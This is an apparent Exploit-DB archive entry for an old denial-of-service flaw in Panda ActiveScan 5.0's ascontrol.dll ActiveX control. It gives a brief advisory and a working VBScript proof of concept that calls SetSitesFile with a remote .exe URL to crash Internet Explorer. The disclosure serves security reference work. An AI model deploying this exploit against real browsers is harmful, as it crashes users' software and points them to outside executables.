Panda ActiveScan 5.0 - 'ascontrol.dll' Denial of Service

EDB-ID:

23918

CVE:

N/A




Platform:

Windows

Date:

2004-04-06


source: https://www.securityfocus.com/bid/10067/info

It has been reported that Panda ActiveScan may be prone to a denial of service vulnerability that may cause an instance of Internet Explorer to crash. The issue may present it self when the 'SetSitesFile' is called in combination with setting the 'InstallEngineCtl' object.

Panda ActiveScan 5.0 has been reported to be prone to this issue.


<script language=vbscript>
dim mymy
Set mymy = CreateObject("ASControls.InstallEngineCtl.1" )
mymy.SetSitesFile "http://rafiwarez.tripod.com/ncx.exe", ASIA, hebrew
</script>